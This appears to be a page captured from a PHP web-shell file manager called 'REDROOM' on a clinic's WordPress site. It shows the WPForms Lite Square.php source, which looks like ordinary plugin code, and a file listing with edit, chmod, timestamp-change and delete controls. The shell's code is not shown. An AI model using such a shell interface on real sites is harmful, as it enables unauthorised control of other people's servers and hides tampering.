REDROOM
PHP 8.2.31
Path:
Logout
Edit File
Size: 5.15 KB
Close
//home/nshryvcy/radiantskinclinics.org/wp-content/plugins/wpforms-lite/src/Integrations/Square/Square.php
Text
Base64
<?php namespace WPForms\Integrations\Square; use WPForms\Integrations\IntegrationInterface; /** * Integration of the Square payment gateway. * * @since 1.9.5 */ final class Square implements IntegrationInterface { /** * Square application name. * * @since 1.9.5 */ public const APP_NAME = 'WPForms'; /** * Determine if the integration is allowed to load. * * @since 1.9.5 * * @return bool */ public function allow_load(): bool { static $allow_load; if ( $allow_load !== null ) { return $allow_load; } // Determine whether the Square addon version is compatible with the WPForms plugin version. $addon_compat = ( new AddonCompatibility() )->init(); // Do not load integration if unsupported version of the Square addon is active. if ( $addon_compat && ! $addon_compat->is_supported_version() ) { $addon_compat->hooks(); $allow_load = false; return $allow_load; } // Determine whether the cURL extension is enabled. $curl_compat = ( new CurlCompatibility() )->init(); // Do not load integration if curl is not enabled. if ( $curl_compat ) { $curl_compat->hooks(); $allow_load = false; return $allow_load; } /** * Whether the integration is allowed to load. * * @since 1.9.5 * * @param bool $is_allowed Integration loading state. */ $allow_load = (bool) apply_filters( 'wpforms_integrations_square_allow_load', true ); return $allow_load; } /** * Load the integration. * * @since 1.9.5 */ public function load() { $this->load_admin_entries(); $this->load_settings(); $this->load_connect(); $this->load_field(); $this->load_frontend(); $this->load_integrations(); $this->load_payments_actions(); $this->load_builder(); $this->load_webhooks(); $this->load_tasks(); // Bail early for paid users with active Square addon. if ( Helpers::is_pro() ) { return; } $this->load_builder_settings(); $this->load_processing(); } /** * Build the Square tile for the Payments Get Started empty state. * * @since 1.10.1.1 * * @return array|null */ public static function get_started_gateway(): ?array { if ( ! ( new self() )->allow_load() ) { return null; } return [ 'icon' => WPFORMS_PLUGIN_URL . 'assets/images/addon-icon-square.png', 'name' => __( 'Square', 'wpforms-lite' ), 'description' => __( 'Accept payments online and in person with unified Square reporting.', 'wpforms-lite' ), 'url' => ( new Admin\Connect() )->get_connect_url( '' ), 'badge' => '', 'cta' => __( 'Connect', 'wpforms-lite' ), 'cta_target' => '_self', 'cta_class' => '', ]; } /** * Load admin entries functionality. * * @since 1.9.5 */ private function load_admin_entries() { if ( wpforms_is_admin_page( 'entries' ) ) { ( new Admin\Entries() )->init(); } } /** * Load Square settings. * * @since 1.9.5 */ private function load_settings() { if ( wpforms_is_admin_page( 'settings', 'payments' ) ) { ( new Admin\Settings() )->init(); ( new Admin\Notices() )->init(); } } /** * Load connect handler. * * @since 1.9.5 */ private function load_connect() { ( new Admin\Connect() )->init(); } /** * Load Square field. * * @since 1.9.5 */ private function load_field() { // phpcs:disable WordPress.Security.NonceVerification $is_elementor = ( ! empty( $_POST['action'] ) && $_POST['action'] === 'elementor_ajax' ) || ( ! empty( $_GET['action'] ) && $_GET['action'] === 'elementor' ); // phpcs:enable WordPress.Security.NonceVerification if ( $is_elementor || ! is_admin() || wp_doing_ajax() || wpforms_is_admin_page( 'builder' ) ) { ( new Fields\Square() )->init(); } } /** * Load builder functionality. * * @since 1.9.5 */ private function load_builder() { if ( wpforms_is_admin_page( 'builder' ) ) { ( new Admin\Builder\Enqueues() )->init(); } } /** * Load builder settings functionality. * * @since 1.9.5 */ private function load_builder_settings() { if ( wpforms_is_admin_page( 'builder' ) ) { ( new Admin\Builder\Settings() )->init(); ( new Admin\Builder\Notifications() )->init(); } } /** * Load payments actions. * * @since 1.9.5 */ private function load_payments_actions() { if ( ! Connection::get() ) { return; } ( new Admin\Payments\SingleActionsHandler() )->init(); } /** * Load frontend functionality. * * @since 1.9.5 */ private function load_frontend() { if ( ! is_admin() ) { ( new Frontend() )->init(); } } /** * Load payment form processing. * * @since 1.9.5 */ private function load_processing() { if ( ! is_admin() || wpforms_is_frontend_ajax() ) { ( new Process() )->init(); } } /** * Load integrations. * * @since 1.9.5 */ private function load_integrations() { ( new Integrations\Loader() )->init(); } /** * Load webhooks. * * @since 1.9.5 */ private function load_webhooks() { ( new Api\WebhookRoute() )->init(); ( new WebhooksHealthCheck() )->init(); } /** * Load tasks. * * @since 1.9.5 */ private function load_tasks() { if ( ! Connection::get() ) { return; } ( new Tasks() )->init(); } }
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 4 × Files: 9
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
Admin
DIR
-
drwxr-xr-x
2026-06-04 03:43:03
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Api
DIR
-
drwxr-xr-x
2026-06-04 03:43:03
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Fields
DIR
-
drwxr-xr-x
2026-06-04 03:43:03
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Integrations
DIR
-
drwxr-xr-x
2026-06-04 03:43:03
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
AddonCompatibility.php
1.36 KB
lrw-r--r--
2025-04-24 14:53:30
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Connection.php
10.11 KB
lrw-r--r--
2025-04-24 14:53:30
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
CurlCompatibility.php
1.11 KB
lrw-r--r--
2025-04-24 14:53:30
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Frontend.php
4.71 KB
lrw-r--r--
2025-04-24 14:53:30
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Helpers.php
11.82 KB
lrw-r--r--
2025-04-24 14:53:30
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Process.php
31.20 KB
lrw-r--r--
2026-01-29 20:00:56
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Square.php
5.15 KB
lrw-r--r--
2026-06-03 16:18:22
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Tasks.php
710 B
lrw-r--r--
2025-04-24 14:53:30
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
WebhooksHealthCheck.php
5.14 KB
lrw-r--r--
2025-04-24 14:53:30
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).